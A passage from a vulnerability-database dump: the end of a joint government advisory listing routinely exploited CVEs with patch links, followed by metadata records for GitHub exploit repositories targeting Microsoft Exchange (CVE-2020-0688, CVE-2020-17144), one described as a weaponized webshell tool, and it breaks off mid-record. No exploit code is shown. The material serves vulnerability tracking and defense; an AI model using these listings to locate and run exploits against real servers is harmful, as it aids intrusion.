| [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) | Microsoft Exchange Server | Multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>) | CISA Alert [Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-062a>); ACSC Advisory [Active exploitation of Vulnerable Microsoft Exchange servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-002-active-exploitation-vulnerable-microsoft-exchange-servers>); CCCS Alert [Active Exploitation of Microsoft Exchange Vulnerabilities - Update 4](<https://www.cyber.gc.ca/en/alerts/active-exploitation-microsoft-exchange-vulnerabilities>) |
| [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>) | |
| [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) | |
| [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) | [Microsoft Security Update Guide: Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>) | |
| [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) | Jira Atlassian | Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5 | [Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>) | ACSC Alert [Remote code execution vulnerability present in certain versions of Atlassian Confluence](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence>); CCCS [Atlassian Security Advisory](<https://www.cyber.gc.ca/en/alerts/atlassian-security-advisory>) |
| [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>) | Pulse Secure | PCS 9.0R3/9.1R1 and Higher | [Pulse Secure SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>) | CCCS Alert [Active Exploitation of Pulse Connect Secure Vulnerabilities - Update 1](<https://www.cyber.gc.ca/en/alerts/active-exploitation-pulse-connect-secure-vulnerabilities>) |
| [CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>) | SonicWall | SMA 100 devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v) | [SonicWall Security Advisory SNWLID-2021-0001](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001>) | |
| [CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) | Microsoft | Multiple Windows products; see [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) | [Microsoft Security Update Guide: Windows Print Spooler Remote Code Execution Vulnerability, CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) | CCCS [Alert Windows Print Spooler Vulnerability Remains Unpatched – Update 3](<https://www.cyber.gc.ca/en/alerts/windows-print-spooler-vulnerability-remains-unpatched>) |
| [CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>) | QNAP | QTS, multiple versions; see [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>); QuTS hero h4.5.1.1491 build 20201119 and later | [QNAP: Command Injection Vulnerability in QTS and QuTS hero](<https://www.qnap.com/en/security-advisory/qsa-21-05>) | |
| [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | Microsoft | Windows Server, multiple versions; see [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) | [Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) | ACSC Alert [Netlogon elevation of privilege vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/acsc/view-all-content/alerts/netlogon-elevation-privilege-vulnerability-cve-2020-1472>); Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); CCCS Alert [Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472>) |
| [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft | Exchange Server, multiple versions; see [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) | [Microsoft Security Update Guide: Microsoft Exchange Validation Key Remote Code Execution Vulnerability, CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) | CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>); Joint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>); CCCS Alert [Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://www.cyber.gc.ca/en/alerts/microsoft-exchange-validation-key-remote-code-execution-vulnerability>) |
| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix | ADC and Gateway version 13.0 all supported builds before 13.0.47.24; NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18, version 12.0 all supported builds before 12.0.63.13, version 11.1 all supported builds before 11.1.63.15, version 10.5 all supported builds before 10.5.70.12; SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b | [Citrix Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>) | Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>); CCCS Alert [Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0>) |
| [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) | Progress Telerik | UI for ASP.NET AJAX through 2019.3.1023 | [Telerik UI for ASP.NET AJAX Allows JavaScriptSerializer Deserialization](<https://docs.telerik.com/devtools/aspnet-ajax/knowledge-base/common-allows-javascriptserializer-deserialization>) | ACSC Alert [Active exploitation of vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>) |
| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Secure | Pulse Connect Secure 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 | [Pulse Secure: SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) | CISA Alert [Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa20-010a>); CISA Alert [Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>); ACSC Advisory [Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/acsc/view-all-content/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software>); Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); CCCS [Alert APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) |
| [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | Fortinet | FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | [Fortinet FortiGuard Labs: FG-IR-20-233](<https://www.fortiguard.com/psirt/FG-IR-20-233>) | Joint CSA [Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>); Joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>); Joint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>); ACSC Alert [APT exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>); CCCS Alert [Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1](<https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi>) |
| [CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>) | Cisco | See [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>) | [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>) | CCCS [Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature](<https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature>) |
| [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) | Microsoft | Office, multiple versions; see [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) | [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) | CCCS Alert [Microsoft Office Security Update](<https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update>) |
| [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) | Microsoft | Multiple products; see [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) | [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) | CCCS [Microsoft Security Updates](<https://www.cyber.gc.ca/en/alerts/microsoft-security-updates>) |

### Contact Information

**U.S. organizations:** all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>).

**Australian organizations:** visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.

**Canadian organizations:** report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>).

**New Zealand organizations:** report cyber security incidents to [incidents@ncsc.govt.nz](<mailto:incidents@ncsc.govt.nz>) or call 04 498 7654.

**United Kingdom organizations:** report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

### Revisions

April 27, 2022: Initial Version

", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T12:00:00", "type": "ics", "title": "2021 Top Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0171", "CVE-2018-13379", "CVE-2019-11510", "CVE-2019-18935", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-2509", "CVE-2021-1675", "CVE-2021-20016", "CVE-2021-20038", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27852", "CVE-2021-31207", "CVE-2021-3156", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35464", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-42237", 
"CVE-2021-44228"], "modified": "2022-04-28T12:00:00", "id": "AA22-117A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-18T01:31:00", "description": "## weaponized tool for CVE-2020-17144(Microsoft Exchange 2010 MR...", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-09T20:57:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2022-07-03T16:01:53", "id": "AC621762-B940-53F9-B9DB-34B015F55B87", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-14T20:42:22", "description": "# CVE-2020-17144-EXP\n\n```\n\u6761\u4ef6: Exchange2010; \u666e\u901a\u7528\u6237\n\u9ed8\u8ba4\u7528\u6cd5(\u5199webshell)...", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-09T10:30:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2022-07-14T14:52:00", "id": "A1463971-12CC-5B11-99E8-018B541F4F71", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:24", "description": "[ - RED TEAM [MOD...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-12T08:28:35", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-07-02T07:14:36", "id": "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:51:57", "description": "<b>[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-17T12:41:51", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-08-19T10:39:41", "id": "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:29:25", "description": "# CVE-2020-0688\r\n\r\nA remote code execution 
vulnerability exists ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-04T10:48:40", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-10-13T07:24:05", "id": "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:30:16", "description": "# ecp_slap\nThis proof-of-concept for [CVE-2020-0688](https://cve...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-23T01:18:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-03-25T01:04:55", "id": "8C937DCD-4090-5A44-9361-4D9ECF545843", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:46:03", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-28T16:04:30", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-12-15T14:38:28", "id": 
"796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:35:26", "description": "# CVE-2020-0688 Scanner\nThis is a little dirty Script to Check f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-27T23:55:04", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-12-15T14:38:28", "id": "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:38", "description": "A memory corruption vulnerability exists in Microsoft Microsoft Exchange. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Memory Corruption (CVE-2020-17144)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": 